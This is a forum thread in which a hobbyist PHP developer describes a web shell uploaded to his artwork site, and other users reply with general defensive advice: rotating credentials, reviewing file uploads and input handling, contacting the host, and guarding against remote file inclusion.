Somehow someone was able to upload a shell script called fx29.php to my site’s root directory. Once there, this script can be run from a browser and gives complete access to my site including my database. I don’t know what their goal was as all they did was get into my index file and say they hadn’t done more than break in and were warning me I had security problems. They made a suggestion that I pass something between pages using session variables to protect my pages. Thanks, but I’d just as soon be left alone, though maybe the warning will lead to my understanding security better. I don’t know what anyone could gain from getting into our site. It just exists to share artwork done by my partner, my friends and me.
I can’t figure out how they managed to upload it, though I suspect it may have been through some administration scripts I have written to allow the upload of images of artwork to our site. I have tried to implement various kinds of security in my scripting, though I must say, it is not a simple thing to figure out, especially since I need to feed a lot of info from page to page using gets, which seems to provide a significant point of intro. I am told there are vulnerabilities in the file upload process as well, a lot beyond my understanding.
I have purchased a couple of ebooks on php security to see where I can tighten things up. The explanations in the books are sometimes a bit abstract and a challenge to apply as they assume a bit more facility with php than my intermediate level skill. I have been coding for a number of years and am getting pretty good at it, though i just do it casually, so there are gaps of even as much as 6 months between when I sit down with it and there are always new things I have to catch up on and old things I need to refresh on. Security is still a challenge for me, obviously.
Can anyone recommend a good resource that provides practical information about securing a site at a level of a coder like myself? Or even any direct advice from someone with more experience than me.
Just in case you haven’t already done it. Change all your access details - ftp, control panel, db - everything. If that file contains all your access details, it’s pretty safe to say that your site has been hacked. If your site happens to be wordpress based, install wordfence and wangguard plugins - I’ve found them both very useful.
[afterthought]
You might also take a look at this site’s security forum which is where this thread probably should be.
I posted this request on the php forum not realizing there was a security forum and someone suggested I post it here.
My site is one I programmed from scratch so it is not connected wordpress or any other cms that I am told provide some kinds of security for their sites.
Somehow someone was able to upload a shell script called fx29.php to my site’s root directory. Once there, this script can be run from a browser and gives complete access to my site including my database. I don’t know what their goal was as all they did was get into my index file and say they hadn’t done more than break in and were warning me I had security problems. They made a suggestion that I pass something between pages using session variables to protect my pages. Thanks, but I’d just as soon be left alone, though maybe the warning will lead to my understanding security better. I don’t know what anyone could gain from getting into our site. It just exists to share artwork done by my partner, my friends and me.
I can’t figure out how they managed to upload it, though I suspect it may have been through some administration scripts I have written to allow the upload of images of artwork to our site. I have tried to implement various kinds of security in my scripting, though I must say, it is not a simple thing to figure out, especially since I need to feed a lot of info from page to page using gets, which seems to provide a significant point of intro. I am told there are vulnerabilities in the file upload process as well, a lot beyond my understanding.
I have purchased a couple of ebooks on php security to see where I can tighten things up. The explanations in the books are sometimes a bit abstract and a challenge to apply as they assume a bit more facility with php than my intermediate level skill. I have been coding for a number of years and am getting pretty good at it, though i just do it casually, so there are gaps of even as much as 6 months between when I sit down with it and there are always new things I have to catch up on and old things I need to refresh on. Security is still a challenge for me, obviously.
Can anyone recommend a good resource that provides practical information about securing a site at a level of a coder like myself? Or even any direct advice from someone with more experience than me.
If you ever post in the wrong forum you can ask an advisor to move a thread, just click on the red flag (bottom left) and request a move. I’ve moved your thread to this security forum.
Depending on the scope of your site this could be a lot of work, but here are list of suggestions to tighten up the security:
If you have access to the firewall then make sure you have only the minimum ports that you need to have access to the website. There should not be any NAT(ed) public ports for you database if it runs in the same private network or server where the site runs.
Review each area with data can be inputted into your application. This includes $POST, $GET, file uploads, AJAX, executed Shell Scripts. To learn more about this you may review www.owasp.org cheat sheet or read [URL=“http://shiflett.org/articles”]Chris Shiflett’s blog (it may be older but is still very relevant). Chris has well written and easier to understand methods of presenting these security ideas.
If it is shared server then you need to talk to your host as an attack can come from any busted site on the shared host. Ask if they are aware of any other sites being hacked on this server and ask to review the web logs or for them to take a look.
One positive sign is that you are not using a CMS and it is your-own-rolled solution as plugins and modules in these environments can often add security bugs.
Steve – These are great ideas. I look forward to digging into the resources. I will check with my web host. I think they are shared servers, though when I spoke to them about the situation, they didn’t raise that issue, simply assumed it was a breach in my security and not their responsibility.
They can gain hosting for any number of illegal or immoral uses in which they would want to remain anonymous. Phishing sites, spamming, pirated software and media, anonymous proxies for other scams…
This would be a likely attack location. Any time I have a look through the php forum at people’s file upload issues, the majority of code I see isn’t fully insecure. If you want you can post up a section of the code relating to processing uploads and we can take a look to see if there’s anything obviously amiss.
Great! I will do that after I take a look at it. I have been thinking about this and realize that this is one of the reasons uploaded files are first loaded into a temporary directory. It should give me a couple of places to check to see where they are being uploaded to. My script does currently check to see if the uploaded file is an image file, though I am not sure if it does this by simply checking the extension or by some more secure method.
It could also be from a remote file inclusion vulnerability (RFI). If you are sending Params like file=filename.jpg. Make sure you can’t load files from urls.